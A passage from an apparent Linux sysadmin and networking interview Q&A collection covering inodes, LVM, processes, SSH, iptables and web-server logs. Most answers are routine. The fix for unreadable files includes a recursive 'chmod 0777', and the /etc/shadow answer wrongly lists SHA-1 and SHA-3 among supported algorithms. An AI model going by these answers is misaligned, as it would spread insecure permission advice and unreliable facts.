Note that when `ls` sends the result to a terminal, it places a "**?**" in the filename to show an unprintable character. You can get rid of this file by using `rm -i *`, which will prompt you before it deletes each file. But you can also use `find` to remove the file, once you know the inode number:

```bash
ls -i
435304 aa?b
find . -inum 435304 -delete
```

Useful resources:

- [Understand UNIX/Linux Inodes Basics with Examples](https://www.thegeekstuff.com/2012/01/linux-inodes/)
- [What is an inode as defined by POSIX?](https://unix.stackexchange.com/questions/387087/what-is-an-inode-as-defined-by-posix/387093)

</details>

<details>
<summary><b><code>ls -l</code> shows file attributes as question marks. What does this mean and what steps will you take to remove unused "zombie" files?</b></summary><br>

This problem may be more difficult to solve because several steps may be required - sometimes you get `test/file: Permission denied`, `test/file: No such file or directory` or `test/file: Input/output error`.

That happens when the user can't do a `stat()` on the files (which requires execute permission on the directory), but can read the directory entries (which requires read access on the directory). So you get a list of files in the directory, but can't get any information on the files because they can't be read. If you have a directory which has read permission but not execute, you'll see this.

Some processes, like `rsync`, generate temporary files that get created and dropped fast, which will cause errors if you try to call other simple file management commands like `rm`, `mv`, etc.

Example of output:

```bash
?????????? ? ? ? ? ? sess_kee6fu9ag7tiph2jae
```

1) change permissions: `chmod 0777 sess_kee6fu9ag7tiph2jae` and try to remove
2) change owner: `chown root:root sess_kee6fu9ag7tiph2jae` and try to remove
3) change permissions and owner for the directory: `chmod -R 0777 dir/ && chown -R root:root dir/` and try to remove
4) recreate the file: `touch sess_kee6fu9ag7tiph2jae` and try to remove
5) watch out for other running processes on the server, for example `rsync`; sometimes you can see this as a transient error when an NFS server is heavily overloaded
6) find the file's inode: `ls -i`, and try to remove it with: `find . -inum <inode_num> -delete`
7) remount (if possible) your filesystem
8) boot the system into single-user mode and repair your filesystem with `fsck`

Useful resources:

- [Question marks showing in ls of directory. IO errors too.](https://serverfault.com/questions/65616/question-marks-showing-in-ls-of-directory-io-errors-too)

</details>

<details>
<summary><b>To LVM or not to LVM. What benefits does it provide?</b></summary><br>

- LVM makes it quite easy to move file systems around: you can extend a volume group onto a new physical volume, move any number of logical volumes off an old physical one, and then remove that volume from the volume group without needing to unmount any partitions
- you can also make snapshots of logical volumes for making backups
- LVM has built-in mirroring support, so you can have a logical volume mirrored across multiple physical volumes
- LVM even supports TRIM

Useful resources:

- [What is LVM and what is it used for?](https://askubuntu.com/questions/3596/what-is-lvm-and-what-is-it-used-for)

</details>

<details>
<summary><b>How to increase the size of an LVM partition?</b></summary><br>

Use the `lvextend` command to resize an LVM partition.

- extending the size by 500MB:

```bash
lvextend -L +500M /dev/vgroup/lvolume
```

- extending over all available free space:

```bash
lvextend -l +100%FREE /dev/vgroup/lvolume
```

and `resize2fs` or `xfs_growfs` to resize the filesystem:

- for ext filesystems:

```bash
resize2fs /dev/vgroup/lvolume
```

- for the xfs filesystem:

```bash
xfs_growfs mountpoint_for_/dev/vgroup/lvolume
```

Useful resources:

- [Extending a logical volume](https://www.tldp.org/HOWTO/LVM-HOWTO/extendlv.html)

</details>

<details>
<summary><b>What is a zombie/defunct process?</b></summary><br>

A zombie is a process that has completed execution (via the `exit` system call) but still has an entry in the process table: it is a process in the "**Terminated state**".

Processes marked **defunct** are dead processes (so-called "zombies") that remain because their parent has not destroyed them properly. These processes will be destroyed by init if the parent process exits.

Useful resources:

- [What is a <defunct> process, and why doesn't it get killed?](https://askubuntu.com/questions/201303/what-is-a-defunct-process-and-why-doesnt-it-get-killed)

</details>

<details>
<summary><b>What is the proper way to upgrade/update a system in production? Do you automate these processes? Do you set downtime for them? Write recommendations. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Your friend, during configuration of the MySQL server, asked you: <i>Should I run <code>sudo mysql_secure_installation</code> after installing mysql?</i> What do you think about it?</b></summary><br>

It would be better if you ran this command, as it provides many security options:

- you can set a password for root accounts
- you can remove root accounts that are accessible from outside the local host
- you can remove anonymous-user accounts
- you can remove the test database, which by default can be accessed by anonymous users

Useful resources:

- [What is Purpose of using mysql_secure_installation?](https://stackoverflow.com/questions/20760908/what-is-purpose-of-using-mysql-secure-installation)

</details>

<details>
<summary><b>Present and explain the good ways of using the <code>kill</code> command.</b></summary><br>

Speaking of killing processes: never use `kill -9`/`SIGKILL` unless absolutely mandatory. This kill can cause problems because of its brute force.
Always try to use the following simple procedure:

- first, send the **SIGTERM** (`kill -15`) signal, which tells the process to shut down and is generally accepted as the signal to use when shutting down cleanly (but remember that this signal can be ignored)
- next, try the **SIGHUP** (`kill -1`) signal, which is commonly used to tell a process to shut down and restart; this signal can also be caught and ignored by a process

The vast majority of the time, this is all you need - and it is much cleaner.

Useful resources:

- [When should I not kill -9 a process?](https://unix.stackexchange.com/questions/8916/when-should-i-not-kill-9-a-process)
- [SIGTERM vs. SIGKILL](https://major.io/2010/03/18/sigterm-vs-sigkill/)

</details>

<details>
<summary><b>What is the <code>strace</code> command and how should it be used? Explain an example of connecting to an already running process.</b></summary><br>

`strace` is a powerful command line tool for debugging and troubleshooting programs in Unix-like operating systems such as Linux. It captures and records all system calls made by a process and the signals received by the process.

**Strace overview**

`strace` can be seen as a lightweight debugger. It allows a programmer/user to quickly find out how a program is interacting with the OS. It does this by monitoring system calls and signals.

**Uses**

Good for when you don't have source code or don't want to be bothered to really go through it. Also useful for your own code if you don't feel like opening up **GDB**, but are just interested in understanding external interaction.

**Example of attaching to a process**

`strace -p <PID>` - attaches strace to a running process.

`strace -e trace=read,write -p <PID>` - with this you can also trace a process/program for particular events, like read and write (in this example). Here it will print all events that involve read and write system calls made by the process.

Other such examples:

- `-e trace=network` - trace all the network related system calls
- `-e trace=signal` - trace all signal related system calls
- `-e trace=ipc` - trace all IPC related system calls
- `-e trace=desc` - trace all file descriptor related system calls
- `-e trace=memory` - trace all memory mapping related system calls

Useful resources:

- [How should strace be used? (original)](https://stackoverflow.com/questions/174942/how-should-strace-be-used)
- [How does strace connect to an already running process? (original)](https://stackoverflow.com/questions/7482076/how-does-strace-connect-to-an-already-running-process)
- [strace: for fun, profit, and debugging](http://timetobleed.com/hello-world/)

</details>

<details>
<summary><b>When would you use access control lists instead of or in conjunction with the <code>chmod</code> command? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Which algorithms are supported in the <code>/etc/shadow</code> file?</b></summary><br>

Typical current algorithms are:

- MD5
- SHA-1 (also called SHA)

Both of these should no longer be used for cryptographic/security purposes!
- SHA-256
- SHA-512
- SHA-3 (KECCAK was announced the winner of the competition for a new federally approved hash algorithm in October 2012)

Useful resources:

- [What is the algorithm used to encrypt Linux passwords?](https://crypto.stackexchange.com/questions/40841/what-is-the-algorithm-used-to-encrypt-linux-passwords)
- [How to find the hashing algorithm used to obfuscate passwords?](https://unix.stackexchange.com/questions/430141/how-to-find-the-hashing-algorithm-used-to-obfuscate-passwords)

</details>

<details>
<summary><b>What is the use of ulimit in Unix-like systems?</b></summary><br>

Most Unix-like operating systems, including Linux and BSD, provide ways to limit and control the usage of system resources such as threads, files, and network connections on a per-process and per-user basis. These "**ulimits**" prevent single users from using too many system resources.

</details>

<details>
<summary><b>What are soft limits and hard limits?</b></summary><br>

The **hard limit** is the maximum allowed to a user, set by the superuser or root; this value is set in the file `/etc/security/limits.conf`. The user can increase the **soft limit** on their own when more resources are needed, but cannot set the **soft limit** higher than the **hard limit**.

</details>

<details>
<summary><b>During configuration of HAProxy to work with Redis you get <code>General socket error (Permission denied)</code> in the log. SELinux is enabled. Explain basic SELinux troubleshooting in CLI. ***</b></summary><br>

Useful resources:

- [Basic SELinux Troubleshooting in CLI](https://access.redhat.com/articles/2191331)

</details>

<details>
<summary><b>You have configured an RSA key login but your server shows <code>Server refused our key</code>. Where will you look for the cause of the problem?</b></summary><br>

**Server side**

Setting `LogLevel VERBOSE` in the file `/etc/ssh/sshd_config` is probably what you need, although there are higher levels. SSH auth failures are logged in `/var/log/auth.log`, `/var/log/secure` or `/var/log/audit/audit.log`, depending on the distribution.

The following should give you only ssh related log lines (for example):

```bash
grep 'sshd' /var/log/auth.log
```

Next, the simplest command to list all failed SSH logins is the one shown below:

```bash
grep "Failed password" /var/log/auth.log
```

Also useful is:

```bash
grep "Failed\|Failure" /var/log/auth.log
```

On newer Linux distributions you can query the runtime log maintained by the systemd journal daemon via the `journalctl` command (`ssh.service` or `sshd.service`). For example:

```bash
journalctl _SYSTEMD_UNIT=ssh.service | egrep "Failed|Failure"
```

**Client side**

Also run the SSH client with `-v` (the first level of verbosity). You can enable additional verbosity (levels 2 and 3) for even more debugging messages with `-vv` or `-vvv`.

Useful resources:

- [Enable Debugging Mode in SSH to Troubleshoot Connectivity Issues](https://www.tecmint.com/enable-debugging-mode-in-ssh/)

</details>

<details>
<summary><b>Why do most distros use ext4, as opposed to XFS or other filesystems? Why are there so many of them? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>A project manager needs a new SQL Server. What do you ask her/him? ***</b></summary><br>

I want the DBA to ask questions like:

- How big will the database be? (whether we can add the database to an existing server)
- How critical is the database?
(about clustering, disaster recovery, high availability)

</details>

<details>
<summary><b>Create a file with 100 lines with random values.</b></summary><br>

For example:

```bash
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 100 > /path/to/file
```

</details>

<details>
<summary><b>How to run a script as another user without a password?</b></summary><br>

For example (with the `visudo` command):

```bash
user1 ALL=(user2) NOPASSWD: /opt/scripts/bin/generate.sh
```

The command paths must be absolute! Then call `sudo -u user2 /opt/scripts/bin/generate.sh` from a user1 shell.

</details>

<details>
<summary><b>How to check if running as root in a bash script? What should you watch out for?</b></summary><br>

In a bash script, you have several ways to check if the running user is root.

As a warning, do not check if a user is root by using the root username. Nothing guarantees that the user with ID 0 is called root. It's a very strong convention that is broadly followed, but anybody could give the superuser another name.

I think the best way when using bash is to use `$EUID`, because `$UID` could be changed and not reflect the real user running the script.

```bash
if (( $EUID != 0 )); then
  echo "Please run as root"
  exit
fi
```

</details>

<details>
<summary><b>Can you give a particular example when it is indicated to use the <code>nobody</code> account? Tell me the differences between running the httpd service as <code>nobody</code> and as <code>www-data</code>.</b></summary><br>

In many Unix variants, `nobody` is the conventional name of a user account which owns no files, is in no privileged groups, and has no abilities except those which every other user has.

It is common to run daemons as `nobody`, especially servers, in order to limit the damage that could be done by a malicious user who gained control of them. However, the usefulness of this technique is reduced if more than one daemon is run like this, because then gaining control of one daemon would provide control of them all. The reason is that `nobody`-owned processes have the ability to send signals to each other and even debug each other, allowing them to read or even modify each other's memory.

**When should I use the `nobody` account?**

When permissions aren't required for a program's operations. This is most notable when there isn't ever going to be any disk activity. A real-world example of this is **memcached** (a key-value in-memory cache/database/thing) sitting on my computer and my server, running under the `nobody` account. Why? Because it just doesn't need any permissions, and giving it an account that did have write access to files would just be a needless risk.

A good example is also web servers. Imagine if Apache ran as root: someone who found a way to send custom commands to it through the server would have access to your entire system.

The `nobody` account is also used as a restricted account for giving users filesystem access without an actual shell like bash. This should prevent them from being able to execute things.

**`nobody` or `www-data` for httpd (Apache)**

Upon starting, Apache needs root access, but it quickly drops this and assumes the identity of a non-privileged user. This user can be either `nobody`, `apache`, or `www-data`.

Several applications use the user `nobody` as a default. For example, you probably never really want, say, the Apache service to be overwriting files that belong to bind. Having a per-service account tends to be a very good idea.
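For reference, the user and group the worker processes run as are a pair of directives in the Apache configuration (a minimal sketch; the account name depends on your distribution):

```bash
# httpd.conf / apache2.conf - identity assumed after dropping root
User www-data
Group www-data
```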
Getting Apache to run as `nobody:nobody` is pretty easy: just update the user and group settings shown above. But, as I mentioned, I don't really recommend that particular user/group. It is entirely possible that you may be tempted to add a service to the system at some time in the future that also runs as `nobody`, and you will forget that you have given write access on the filesystem to the user `nobody`.

If `nobody` were somehow to become compromised, it could potentially have more impact than an application-isolated user such as `www-data`. Of course, a lot of this will depend on the file and group permissions: `nobody` uses the permissions of *others*, while an application-specific user could be configured to allow file read access via its group while *others* are still denied.

Useful resources:

- [What is nobody user and group?](https://unix.stackexchange.com/questions/186568/what-is-nobody-user-and-group)
- [The Linux and Unix Nobody User](http://linuxg.net/the-linux-and-unix-nobody-user/)
- [What is the purpose of the 'nobody' user?](https://askubuntu.com/questions/329714/what-is-the-purpose-of-the-nobody-user)

</details>

<details>
<summary><b>Is there a way to redirect output to a file and have it display on stdout?</b></summary><br>

The command you want is named `tee`: `foo | tee output.file`

For example, if you only care about stdout: `ls -a | tee output.file`

If you want to include stderr, do: `program [arguments...] 2>&1 | tee outfile`

`2>&1` redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), so that both are written to stdout; both are then also directed to the given output file by the `tee` command.

Furthermore, if you want to append to the log file, use `tee -a`, as in: `program [arguments...] 2>&1 | tee -a outfile`

</details>

<details>
<summary><b>What is the preferred bash shebang and why? What is the difference between executing a file using <code>./script</code> or <code>bash script</code>?</b></summary><br>

You should use `#!/usr/bin/env bash` for portability: different \*nixes put bash in different places, and using `/usr/bin/env` is a workaround to run the first bash found on the `PATH`.

Running `./script` does exactly that, and requires execute permission on the file, but is agnostic to what type of a program it is. It might be a **bash script**, an **sh script**, or a **Perl**, **Python**, **awk**, or **expect script**, or an actual **binary executable**. Running `bash script` forces it to be run under **bash**, regardless of its shebang, and does not require execute permission on the file.

Useful resources:

- [What is the preferred Bash shebang? (original)](https://stackoverflow.com/questions/10376206/what-is-the-preferred-bash-shebang)

</details>

<details>
<summary><b>You must run a command that will run for a very long time. How to prevent this process from being killed after the ssh session drops?</b></summary><br>

Use `nohup` to make your process ignore the hangup signal:

```bash
nohup long-running-process &
exit
```

or use **GNU Screen**:

```bash
screen -d -m long-running-process
exit
```

Useful resources:

- [5 Ways to Keep Remote SSH Sessions and Processes Running After Disconnection](https://www.tecmint.com/keep-remote-ssh-sessions-running-after-disconnection/)

</details>

<details>
<summary><b>What is the main purpose of intermediate certification authorities?</b></summary><br>

To find out the main purpose of an intermediate CA, you should first learn about **Root CAs**, **Intermediate CAs**, and the **SSL Certificate Chain Trust**.
**Root CAs** are primary CAs which typically don't directly sign end entity/server certificates. They issue root certificates, which are usually pre-installed within all browsers, mobiles, and applications. The private key of these certificates is used to sign other, subsequent certificates called intermediate certificates. Root CAs are usually kept "offline" and in a highly secure environment with stringently limited access.

**Intermediate CAs** are CAs subordinate to the Root CA by one or more levels, trusted by it to sign certificates on its behalf. The purpose of creating and using Intermediate CAs is primarily security: if the intermediate private key is compromised, the Root CA can revoke the intermediate certificate and create a new one with a new cryptographic key pair.

The **SSL Certificate Chain Trust** is the list of SSL certificates from the root certificate to the end entity/server certificate. For an SSL certificate to be trusted, it must be issued by a trusted CA which is included in the trusted CA list of the connecting device (browser, mobile, application). Therefore, the connecting device will test the trustworthiness of each SSL certificate in the chain of trust until it matches one issued by a trusted CA.

The **Root-Intermediate CA** structure is created by each major CA to protect against the disastrous effects of a root key compromise. If a root key were compromised, it would render the root and all subordinate certificates untrustworthy. For this reason, creating an Intermediate CA is a best practice to ensure rigorous protection of the primary root key.

Useful resources:

- [How certificate chains work](https://knowledge.digicert.com/solution/SO16297.html)

</details>

<details>
<summary><b>How to reload PostgreSQL after configuration changes?</b></summary><br>

Solution 1:

```bash
systemctl reload postgresql
```

Solution 2:

```
su - postgres
/usr/bin/pg_ctl reload
```

Solution 3:

```
SELECT pg_reload_conf();
```

</details>

<details>
<summary><b>You have added several aliases to <code>.profile</code>. How to reload the shell without exiting?</b></summary><br>

The best way is `exec $SHELL -l`, because `exec` replaces the current process with a new one. Another good (but different) solution is `. ~/.profile`.

Useful resources:

- [How to reload .bash_profile from the command line?](https://stackoverflow.com/questions/4608187/how-to-reload-bash-profile-from-the-command-line)

</details>

<details>
<summary><b>How to exit without saving shell history?</b></summary><br>

```bash
kill -9 $$
```

or

```bash
unset HISTFILE && exit
```

Useful resources:

- [How do I close a terminal without saving the history?](https://unix.stackexchange.com/questions/25049/how-do-i-close-a-terminal-without-saving-the-history)

</details>

<details>
<summary><b>What is this UID 0 toor account? Have I been compromised?</b></summary><br>

**toor** is an alternative superuser account, where toor is root spelled backwards. It is intended to be used with a non-standard shell, so the default shell for root does not need to change.

This is important, as shells which are not part of the base distribution, but are instead installed from ports or packages, are installed in `/usr/local/bin`, which, by default, resides on a different file system. If root's shell is located in `/usr/local/bin` and the file system containing `/usr/local/bin` is not mounted, root will not be able to log in to fix a problem, and will have to reboot into single-user mode in order to enter the path to a shell.
Some people use toor for day-to-day root tasks with a non-standard shell, leaving root, with a standard shell, for single-user mode or emergencies. By default, a user cannot log in using toor as it does not have a password, so log in as root and set a password for toor before using it to log in.

Useful resources:

- [The root account (and toor)](https://administratosphere.wordpress.com/2007/10/04/the-root-account-and-toor/)

</details>

<details>
<summary><b>Is there an easy way to search inside thousands of files in a complex directory structure to find files which contain a specific string?</b></summary><br>

For example, use `fgrep`:

```bash
fgrep -r "string" *
```

or:

```bash
grep -insr "pattern" *
```

- `-i` ignore case distinctions in both the **PATTERN** and the input files
- `-n` prefix each line of output with the 1-based line number within its input file
- `-s` suppress error messages about nonexistent or unreadable files
- `-r` read all files under each directory, recursively

Useful resources:

- [How to grep a string in a directory and all its subdirectories files in LINUX?](https://stackoverflow.com/questions/15622328/how-to-grep-a-string-in-a-directory-and-all-its-subdirectories-files-in-linux)

</details>

<details>
<summary><b>How to find out which dynamic libraries an executable loads when run?</b></summary><br>

You can do this with the `ldd` command:

```bash
ldd /bin/ls
```

</details>

<details>
<summary><b>You have the task of syncing the testing and production environments. What steps will you take?</b></summary><br>

It's easy to get dragged down into bikeshedding about cloning environments and miss the real point: only production is production, and every time you deploy there you are testing a unique combination of deploy code + software + environment.

Every once in a while, a good solution is regular cloning of the production servers to create testing servers. You can create instances with an exact copy of your production environment under dev/test with snapshots, for example:

- generate a snapshot of production
- copy the snapshot to staging (or elsewhere)
- create a new disk using this snapshot

Sure, you can spin up clones of various system components or entire systems, and capture real traffic to replay offline (the gold standard of systems testing). But many systems are too big, complex, and cost-prohibitive to clone.

Before environment synchronization, a good practice is keeping track of every change that you make to the testing environment and providing a way of propagating it to the production environment, so that you do not skip any step and do it as smoothly as possible. A structure comparison tool, or deploy scripts that update the testing environment from the production environment, are also a good solution.

**Presync tasks**

First of all, inform developers and clients about not making changes on the test environment (if possible, disable test domains that target this environment or set static pages with information about the synchronization). It is also important to make backups/snapshots of both environments.

**Database servers**

- sync/update system version (e.g. packages)
- create a dump file from the database on the production db server
- import the dump file on the testing db server
- if necessary, sync login permissions, roles, database permissions, open connections to the database and others

**Web/App servers**

- sync/update system version (e.g. packages)
- if necessary, update kernel parameters, firewall rules and others
- sync/update configuration files of all running/important services
- sync/update user accounts (e.g. permissions) and their home directories
- deploy the project from the git/svn repository
- sync/update important directories existing in the project, e.g. **static**, **assets** and others
- sync/update permissions for the project directory
- remove/update all webhooks
- update cron jobs

**Other tasks**

- update configurations of load balancers for testing domains and specific URLs
- update configurations of queues, session and storage instances

Useful resources:

- [Keeping testing and production server environments clean, in sync, and consistent](https://stackoverflow.com/questions/639668/keeping-testing-and-production-server-environments-clean-in-sync-and-consisten)

</details>

###### Network Questions (24)

<details>
<summary><b>Configure a virtual interface on your workstation. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>According to an HTTP monitor, a website is down. You're able to telnet to the port, so how do you resolve it?</b></summary><br>

If you can telnet to the port, this means that the service listening on the port is running and you can connect to it (it's not a networking problem). It is good to check this both against the IP address the domain resolves to and against the domain itself.

First of all, check if your site is online from another location. That lets you know whether the site is down everywhere, or only your network is unable to view it. It is also a good idea to check what the web browser returns.

**If only the IP connection works**

- you can use whois to see what DNS servers serve up the hostname of the site: `whois www.example.com`
- you can use tools like `dig` or `host` to test DNS and see if the host name is resolving: `host www.example.org dns.example.org`
- you can also check against global public DNS servers: `host www.example.com 9.9.9.9`

If the domain does not resolve, it's probably a problem with the DNS servers.

**If the domain resolves properly**

- investigate the log files and resolve the issue according to the logs; it's the best way to see what's wrong
- check the HTTP status code; usually it will be a 5xx response. Maybe the server is overloaded because clients are making lots of connections to the website? Maybe your caching rules aren't working properly?
- check the web/proxy server configuration (e.g. `nginx -t -c </path/to/nginx.conf>`); maybe another sysadmin has made some changes to the domain configuration?
- maybe something on the server has crashed? Maybe it has run out of disk space or memory?
- maybe it's a programming error on the website?

</details>

<details>
<summary><b>Load balancing can dramatically impact server performance. Discuss several load balancing mechanisms. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>List examples of network troubleshooting tools that can degrade during DNS issues. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Explain the difference between HTTP 1.1 and HTTP 2.0.</b></summary><br>

**HTTP/2** supports request multiplexing, header compression, prioritization and more intelligent packet streaming management. This results in reduced latency and accelerates content download on modern web pages.
Key differences with **HTTP/1.1**:

- it is binary, instead of textual
- fully multiplexed, instead of ordered and blocking
- can therefore use one connection for parallelism
- uses header compression to reduce overhead
- allows servers to "push" responses proactively into client caches

Useful resources:

- [What is HTTP/2 - The Ultimate Guide](https://kinsta.com/learn/what-is-http2/)

</details>

<details>
<summary><b>Dev team reports an error: <code>POST http://ws.int/api/v1/Submit/ resulted in a 413 Request Entity Too Large</code>. What's wrong?</b></summary><br>

**Modify the NGINX configuration file for the domain**

Set the `client_max_body_size` directive to a sufficient value:

```bash
client_max_body_size 20M;
```

Restart Nginx to apply the changes.

**Modify the php.ini file for upload limits**

It's not needed in all configurations, but you may also have to modify the PHP upload settings to ensure that nothing exceeds the limits set in the PHP configuration.

Find the following directives one by one:

```bash
upload_max_filesize
post_max_size
```

and increase their limits to 20M; by default they are 8M and 2M:

```bash
upload_max_filesize = 20M
post_max_size = 20M
```

Finally, save the file and restart PHP.

Useful resources:

- [413 Request Entity Too Large in Nginx with client_max_body_size set](https://serverfault.com/questions/814767/413-request-entity-too-large-in-nginx-with-client-max-body-size-set)

</details>

<details>
<summary><b>What is the handshake mechanism and why do we need a 3-way handshake?</b></summary><br>

**Handshaking** begins when one device sends a message to another device indicating that it wants to establish a communications channel. The two devices then send several messages back and forth that enable them to agree on a communications protocol.

A **three-way handshake** is a method used in a TCP/IP network to create a connection between a local host/client and a server. It is a three-step method that requires both the client and server to exchange `SYN` and `ACK` (`SYN`, `SYN-ACK`, `ACK`) packets before actual data communication begins.

Useful resources:

- [Why do we need a 3-way handshake? Why not just 2-way?](https://networkengineering.stackexchange.com/questions/24068/why-do-we-need-a-3-way-handshake-why-not-just-2-way)

</details>

<details>
<summary><b>Why is UDP faster than TCP?</b></summary><br>

**UDP** is faster than **TCP** for the simple reason that it has no acknowledgement packet (`ACK`), which permits a continuous packet stream. TCP, by contrast, acknowledges sets of packets, calculated using the TCP window size and round-trip time (`RTT`).

Useful resources:

- [UDP vs TCP, how much faster is it?](https://stackoverflow.com/questions/47903/udp-vs-tcp-how-much-faster-is-it)

</details>

<details>
<summary><b>Which, in your opinion, are the 5 most important OpenSSH parameters that improve security? ***</b></summary><br>

To be completed.

Useful resources:

- [OpenSSH security and hardening](https://linux-audit.com/audit-and-harden-your-ssh-configuration/)

</details>

<details>
<summary><b>What is NAT? What is it used for?</b></summary><br>

It enables private IP networks that use unregistered IP addresses to connect to the Internet. **NAT** operates on a router, usually connecting two networks together, and translates the private (not globally unique) addresses in the internal network into legal addresses before packets are forwarded to another network.
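A minimal sketch of source NAT (masquerading) on a Linux router with iptables; the interface name `eth0` is illustrative, and IP forwarding must be enabled:

```bash
# Let the kernel forward packets between interfaces
sysctl net.ipv4.ip_forward=1

# Rewrite the source address of packets leaving via eth0
# to the router's own public address
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```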
Workstations or other computers requiring special access outside the network can be assigned specific external IPs using **NAT**, allowing them to communicate with computers and applications that require a unique public IP address. **NAT** is also a very important aspect of firewall security.

Useful resources:

- [Network Address Translation (NAT) Concepts](http://www.firewall.cx/networking-topics/network-address-translation-nat/227-nat-concepts.html)

</details>

<details>
<summary><b>What is the purpose of Spanning Tree?</b></summary><br>

This protocol operates at layer 2 of the OSI model with the purpose of preventing loops on the network. Without **STP**, a redundant switch deployment would create broadcast storms that cripple even the most robust networks. There are several iterations based on the original IEEE 802.1D standard; each operates slightly differently from the others while largely accomplishing the same loop-free goal.

</details>

<details>
<summary><b>How to check which ports are listening on my Linux server?</b></summary><br>

Use one of:

- `lsof -i`
- `ss -l`
- `netstat -atn` - for tcp
- `netstat -aun` - for udp
- `netstat -tulapn`

</details>

<details>
<summary><b>What does <code>Host key verification failed</code> mean when you connect to a remote host? Do you accept it automatically?</b></summary><br>

`Host key verification failed` means that the host key of the remote host was changed. This can easily happen when connecting to a computer whose host keys in `/etc/ssh` have changed, e.g. if that computer was upgraded without copying its old host keys. The host keys are proof, when you reconnect to a remote computer with ssh, that you are talking to the same computer you connected to the first time you accessed it.

Whenever you connect to a server via SSH, that server's public key is stored in a file called **known_hosts** in your home directory (or possibly in your local account settings if using a Mac or Windows desktop). When you reconnect to the same server, the SSH connection will verify that the current public key matches the one you have saved in your **known_hosts** file. If the server's key has changed since the last time you connected to it, you will receive the above error.

Don't delete the entire **known_hosts** file, as recommended by some people; this totally voids the point of the warning. It's a security feature warning you that a man-in-the-middle attack may have happened. Before accepting the new host key, contact your/the other system administrator for verification.

Useful resources:

- [Git error: "Host Key Verification Failed" when connecting to remote repository](https://stackoverflow.com/questions/13363553/git-error-host-key-verification-failed-when-connecting-to-remote-repository)

</details>

<details>
<summary><b>How to send an HTTP request using <code>telnet</code>?</b></summary><br>

For example:

```bash
telnet example.com 80
Trying 192.168.252.10...
Connected to example.com.
Escape character is '^]'.
GET /questions HTTP/1.0
Host: example.com

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
...
```

</details>

<details>
<summary><b>How do you kill a program using e.g.
80 port in Linux?</b></summary><br> To list any process listening to the port 80: ```bash # with lsof lsof -i:80 # with fuser fuser 80/tcp ``` To kill any process listening to the port 80: ```bash kill $(lsof -t -i:80) ``` or more violently: ```bash kill -9 $(lsof -t -i:80) ``` or with `fuser` command: ```bash fuser -k 80/tcp ``` Useful resources: - [How to kill a process running on particular port in Linux?](https://stackoverflow.com/questions/11583562/how-to-kill-a-process-running-on-particular-port-in-linux/32592965) - [Finding the PID of the process using a specific port?](https://unix.stackexchange.com/questions/106561/finding-the-pid-of-the-process-using-a-specific-port) </details> <details> <summary><b>You get <code>curl: (56) TCP connection reset by peer</code>. What steps will you take to solve this problem?</b></summary><br> - check if the URL is correct, maybe you should add `www` or set correctly `Host:` header? Check also scheme (http or https) - check the domain is resolving into a correct IP address - enable debug tracing with `--trace-ascii curl.dump`. `Recv failure` is a really generic error so its hard for more info - use external proxy with `--proxy` for debug connection from external ip - use network sniffer (e.g. `tcpdump`) for debug connection in the lower TCP/IP layers - check firewall rules on the production environment and on the exit point of your network, also check your NAT rules - check MTU size of packets traveling over your network - check SSL version with ssl/tls `curl` params if you connecting to https protocol - it may be a problem on the client side e.g. the netfilter drop or limit connections from your IP address to the domain Useful resources: - [CURL ERROR: Recv failure: Connection reset by peer - PHP Curl](https://stackoverflow.com/questions/10285700/curl-error-recv-failure-connection-reset-by-peer-php-curl) </details> <details> <summary><b>How to allow traffic to/from specific IP with iptables?</b></summary><br> For example: ```bash /sbin/iptables -A INPUT -p tcp -s XXX.XXX.XXX.XXX -j ACCEPT /sbin/iptables -A OUTPUT -p tcp -d XXX.XXX.XXX.XXX -j ACCEPT ``` </details> <details> <summary><b>How to block abusive IP addresses with <code>pf</code> in OpenBSD?</b></summary><br> The best way to do this is to define a table and create a rule to block the hosts, in `pf.conf`: ```bash table <badhosts> persist block on fxp0 from <badhosts> to any ``` And then dynamically add/delete IP addresses from it: ```bash pfctl -t badhosts -T add 1.2.3.4 pfctl -t badhosts -T delete 1.2.3.4 ``` </details> <details> <summary><b>When does the web server like Apache or Nginx write info to log file? Before or after serving the request?</b></summary><br> Both servers provides very comprehensive and flexible logging capabilities - for logging everything that happens on your server, from the initial request, through the URL mapping process, to the final resolution of the connection, including any errors that may have occurred in the process. **Apache** The Apache server access log records all requests processed by the server (after the request has been completed). **Nginx** NGINX writes information about client requests in the access log right after the request is processed. 
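One way to convince yourself of this ordering is to log the request duration: nginx's `$request_time` variable covers the full processing time, so it can only be written once the request has finished. A minimal sketch (the log path and format name are examples):

```bash
# /etc/nginx/nginx.conf fragment - "timed" is an example format name.
# $request_time is the total time nginx spent on the request, so the log
# entry can only be produced after the request completes.
log_format timed '$remote_addr [$time_local] "$request" $status $request_time';
access_log /var/log/nginx/access.log timed;
```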
Useful resources:

- [When does Apache log to access.log - before or after serving the request?](https://webmasters.stackexchange.com/questions/65566/when-does-apache-log-to-access-log-before-or-after-serving-the-request)
- [nginx log request before processing](https://serverfault.com/questions/693049/nginx-log-request-before-processing)

</details>

<details>
<summary><b>Analyse web server log and show only <code>5xx</code> http codes. What external tools do you use?</b></summary><br>

```bash
tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]"
```

Examples of http/https log management tools:

- **goaccess** - is an open source real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through your browser
- **graylog** - is a free and open-source log management platform that supports in-depth log collection and analysis

Useful resources:

- [Best Log Management Tools: 51 Useful Tools for Log Management, Monitoring, Analytics, and More](https://stackify.com/best-log-management-tools/)

</details>

<details>
<summary><b>A developer uses a private key on the server to deploy an app through ssh. Why is this incorrect behavior and what is the better (but not ideal) solution in such situations?</b></summary><br>

You have the private key for your personal account. The server needs your public key so that it can verify that your private key for the account you are trying to use is authorized. The whole point of private keys is that they are private, meaning only you have your private key. If someone takes over your private key, they will be able to impersonate you any time they want.

A better solution is to use ssh agent forwarding. In essence, you need to create a `~/.ssh/config` file, if it doesn't exist. Then, add the hosts (either domain name or IP address) to the file and set `ForwardAgent yes`. Example:

```bash
Host git.example.com
User john
PreferredAuthentications publickey
